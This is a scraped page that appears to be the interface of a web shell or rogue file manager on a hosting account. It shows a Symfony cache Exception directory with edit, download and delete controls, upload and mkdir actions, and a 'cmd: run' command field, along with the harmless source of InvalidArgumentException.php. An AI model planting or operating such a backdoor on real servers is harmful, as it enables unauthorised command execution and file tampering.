/
home
/
techb158
/
immovalet.com
/
vendor
/
symfony
/
cache
/
Exception
/
/home/techb158/immovalet.com/vendor/symfony/cache/Exception
mkdir
upload
Name
Size
Mode
Actions
CacheException.php
655
0644
edit
dl
rm
InvalidArgumentException.php
725
0644
edit
dl
rm
LogicException.php
665
0644
edit
dl
rm
Edit:
/home/techb158/immovalet.com/vendor/symfony/cache/Exception/InvalidArgumentException.php
(725B)
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Cache\Exception; use Psr\Cache\InvalidArgumentException as Psr6CacheInterface; use Psr\SimpleCache\InvalidArgumentException as SimpleCacheInterface; if (interface_exists(SimpleCacheInterface::class)) { class InvalidArgumentException extends \InvalidArgumentException implements Psr6CacheInterface, SimpleCacheInterface { } } else { class InvalidArgumentException extends \InvalidArgumentException implements Psr6CacheInterface { } }
Save
cmd:
run